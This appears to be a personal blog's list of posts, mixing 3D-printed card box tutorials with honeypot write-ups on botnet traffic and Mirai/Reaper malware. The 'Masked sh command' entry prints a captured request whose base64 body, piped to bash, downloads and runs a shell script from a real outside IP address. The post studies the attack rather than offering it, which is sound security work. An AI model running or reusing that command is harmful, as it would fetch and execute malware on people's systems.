Posts
Universal card box
Tutorial for the Universal card box project, which you can find on my Thingiverse page
Fish Botnet
The honey pot has caught a fish, so I guess it's more of a fishing net?
Universal card tray
Tutorial for the Universal card tray project, which you can find on my Thingiverse page
Masked sh command
The honey pot picked up an interesting request:
16:29:23.246 Handling POST to / request from ***.**.***.*
>>>Headers:
honey-pot-ip:8080
Keep-Alive
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
application/x-www-form-urlencoded
179
>>>Body:
doAs="echo Y2QgL3RtcCB8fCBjZCAvbW50IHx8ICBjZCAvcm9vdCB8fCBjZCAvOyBjdXJsIC1PIGh0dHA6Ly8xNzYuNjUuMTM3LjUvemVyby5zaDsgY2htb2QgNzc3IHplcm8uc2g7IHNoIHplcm8uc2ggJg== | base64 -d | bash"
16:29:23.246 completed response status 200
The request's body uses echo to pipe base64-encoded text into the GNU base64 decoder; the decoded output is then piped into bash, causing bash to execute the decoded text.
Reverse Engineering Mirai/Reaper Malware
In my previous post, I showed how I set up a honey pot to capture HTTP requests coming to my IP address. Some of the requests were bots attempting to exploit vulnerabilities in order to gain access to devices and services; one of these requests attempted to inject shell commands to download and run malware.
Setting up a basic honey pot
When playing around with a C# web app library, I noticed the web app I was writing would periodically get random (and sometimes strange) requests from unknown sources, so I thought it would be fun to set up a honey pot and record the requests.